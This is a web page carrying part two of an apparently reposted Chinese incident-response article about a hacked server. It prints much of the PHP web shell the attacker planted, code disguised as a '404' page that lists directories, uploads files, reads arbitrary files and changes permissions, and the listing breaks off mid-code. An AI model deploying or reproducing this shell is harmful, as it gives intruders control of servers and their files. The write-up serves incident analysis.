经典案例
  • 妙视界
  • 广州市坊森室内装饰有限公司
  • ArtsRouge
  • 香港·维西·创意设计机构
  • 阳春冠军联盟
  • Management
  • 爱艺术咖啡会所

惨遭黑客入侵,记一次服务器被攻击的应急行动!(2)

发布于:2017-12-06 19:02来源:网络整理 作者:jimmoo 点击:

一些 PHP Shell 的代码,如下所示:

  1. <?php

  2. set_time_limit(0);

  3. error_reporting(0);

  4. if(get_magic_quotes_gpc()){

  5.    foreach($_POST as $key=>$value){

  6.        $_POST[$key] = stripslashes($value);

  7.    }

  8. }

  9. echo '<!DOCTYPE HTML>

  10. <HTML>

  11. <HEAD>

  12. <link href="" rel="stylesheet" type="text/css">

  13. <title>404-server!!</title>

  14. <style>

  15. body{

  16.    font-family: "Racing Sans One", cursive;

  17.    background-color: #e6e6e6;

  18.    text-shadow:0px 0px 1px #757575;

  19. }

  20. #content tr:hover{

  21.    background-color: #636263;

  22.    text-shadow:0px 0px 10px #fff;

  23. }

  24. #content .first{

  25.    background-color: silver;

  26. }

  27. #content .first:hover{

  28.    background-color: silver;

  29.    text-shadow:0px 0px 1px #757575;

  30. }

  31. table{

  32.    border: 1px #000000 dotted;

  33. }

  34. H1{

  35.    font-family: "Rye", cursive;

  36. }

  37. a{

  38.    color: #000;

  39.    text-decoration: none;

  40. }

  41. a:hover{

  42.    color: #fff;

  43.    text-shadow:0px 0px 10px #ffffff;

  44. }

  45. input,select,textarea{

  46.    border: 1px #000000 solid;

  47.    -moz-border-radius: 5px;

  48.    -webkit-border-radius:5px;

  49.    border-radius:5px;

  50. }

  51. </style>

  52. </HEAD>

  53. <BODY>

  54. <H1><center>config root man</center></H1>

  55. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

  56. <tr><td>Current Path : ';

  57. if(isset($_GET['path'])){

  58.    $path = $_GET['path'];  

  59. }else{

  60.    $path = getcwd();

  61. }

  62. $path = str_replace('','/',$path);

  63. $paths = explode('/',$path);

  64. foreach($paths as $id=>$pat){

  65.    if($pat == '' && $id == 0){

  66.        $a = true;

  67.        echo '<a href="?path=/">/</a>';

  68.        continue;

  69.    }

  70.    if($pat == '') continue;

  71.    echo '<a href="?path=';

  72.    for($i=0;$i<=$id;$i++){

  73.        echo "$paths[$i]";

  74.        if($i != $id) echo "/";

  75.    }

  76.    echo '">'.$pat.'</a>/';

  77. }

  78. echo '</td></tr><tr><td>';

  79. if(isset($_FILES['file'])){

  80.    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

  81.        echo '<font color="green">File Upload Done.</font><br />';

  82.    }else{

  83.        echo '<font color="red">File Upload Error.</font><br />';

  84.    }

  85. }

  86. echo '<b><br>'.php_uname().'<br></b>';

  87. echo '<form enctype="multipart/form-data" method="POST">

  88. Upload File : <input type="file" name="file" />

  89. <input type="submit" value="upload" />

  90. </form>

  91. </td></tr>';

  92. if(isset($_GET['filesrc'])){

  93.    echo "<tr><td>Current File : ";

  94.    echo $_GET['filesrc'];

  95.    echo '</tr></td></table><br />';

  96.    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

  97. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

  98.    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

  99.    if($_POST['opt'] == 'chmod'){

  100.        if(isset($_POST['perm'])){

  101.            if(chmod($_POST['path'],$_POST['perm'])){

  102.                echo '<font color="green">Change Permission Done.</font><br />';

  103.            }else{

  104.                echo '<font color="red">Change Permission Error.</font><br />';

  105.            }

  106.        }

  107.        echo '<form method="POST">

------分隔线----------------------------
------分隔线----------------------------